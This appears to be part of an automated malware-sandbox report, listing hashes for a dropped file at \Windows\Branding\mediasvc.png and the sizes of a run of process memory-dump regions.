c86e20c2a10fd5c5bae4910a73fd62008d41233b

SHA256
177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934

SHA512
87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0

Download Submit
\Windows\Branding\mediasvc.png

MD5
1fa9c1e185a51b6ed443dd782b880b0d

SHA1
50145abf336a196183882ef960d285bd77dd3490

SHA256
f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959

SHA512
16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc

Download Submit
memory/588-96-0x0000000002A10000-0x0000000002A12000-memory.dmp

Filesize
8KB

Download
memory/588-95-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp

Filesize
11.4MB

Download
memory/588-101-0x0000000002A1C000-0x0000000002A3B000-memory.dmp

Filesize
124KB

Download
memory/588-99-0x0000000002A14000-0x0000000002A17000-memory.dmp

Filesize
12KB

Download
memory/588-98-0x0000000002A17000-0x0000000002A18000-memory.dmp

Filesize
4KB

Download
memory/588-97-0x0000000002A12000-0x0000000002A14000-memory.dmp

Filesize
8KB

Download
memory/588-100-0x000000001B8E0000-0x000000001BBDF000-memory.dmp

Filesize
3.0MB

Download
memory/836-79-0x0000000002732000-0x0000000002734000-memory.dmp

Filesize
8KB

Download
memory/836-81-0x0000000002737000-0x0000000002738000-memory.dmp

Filesize
4KB

Download
memory/836-77-0x000000001B960000-0x000000001BC5F000-memory.dmp

Filesize
3.0MB

Download
memory/836-82-0x000000000273C000-0x000000000275B000-memory.dmp

Filesize
124KB

Download
memory/836-80-0x0000000002734000-0x0000000002737000-memory.dmp

Filesize
12KB

Download
memory/836-78-0x0000000002730000-0x0000000002732000-memory.dmp

Filesize
8KB

Download
memory/836-76-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp

Filesize
11.4MB

Download
memory/1464-63-0x0000000002854000-0x0000000002857000-memory.dmp

Filesize
12KB

Download
memory/1464-62-0x0000000002852000-0x0000000002854000-memory.dmp

Filesize
8KB

Download
memory/1464-59-0x000007FEFBE11000-0x000007FEFBE13000-memory.dmp

Filesize
8KB

Download
memory/1464-73-0x000000000287D000-0x000000000287E000-memory.dmp

Filesize
4KB

Download
memory/1464-61-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp

Filesize
11.4MB

Download
memory/1464-65-0x000000000285B000-0x000000000287A000-memory.dmp

Filesize
124KB

Download
memory/1464-60-0x0000000002850000-0x0000000002852000-memory.dmp

Filesize
8KB

Download
memory/1572-86-0x00000000027D0000-0x00000000027D2000-memory.dmp

Filesize
8KB

Download
memory/1572-89-0x00000000027D4000-0x00000000027D7000-memory.dmp

Filesize
12KB

Download
memory/1572-87-0x000000001B7D0000-0x000000001BACF000-memory.dmp

Filesize
3.0MB

Download
memory/1572-85-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp

Filesize
11.4MB

Download
memory/1572-88-0x00000000027D2000-0x00000000027D4000-memory.dmp

Filesize
8KB

Download
memory/1572-91-0x00000000027D7000-0x00000000027D8000-memory.dmp

Filesize
4KB

Download
memory/1572-90-0x00000000027DC000-0x00000000027FB000-memory.dmp

Filesize
124KB

Download
memory/1668-58-0x0000000041137000-0x0000000041138000-memory.dmp

Filesize
4KB

Download
memory/1668-54-0x0000000041460000-0x0000000041710000-memory.dmp

Filesize
2.7MB

Download
memory/1668-57-0x0000000041136000-0x0000000041137000-memory.dmp

Filesize
4KB

Download
memory/1668-56-0x0000000041134000-0x0000000041136000-memory.dmp

Filesize
8KB

Download
memory/1668-55-0x0000000041132000-0x0000000041134000-memory.dmp

Filesize
8KB

Download
memory/1680-109-0x0000000000A20000-0x0000000000A22000-memory.dmp

Filesize
8KB

Download
memory/1680-108-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp

Filesize
11.4MB

Download
memory/1680-110-0x0000000000A22000-0x0000000000A24000-memory.dmp

Filesize
8KB

Download
memory/1680-111-0x0000000000A24000-0x0000000000A27000-memory.dmp

Filesize
12KB

Download
memory/1680-112-0x0000000000A2B000-0x0000000000A4A000-memory.dmp

Filesize
124KB

Download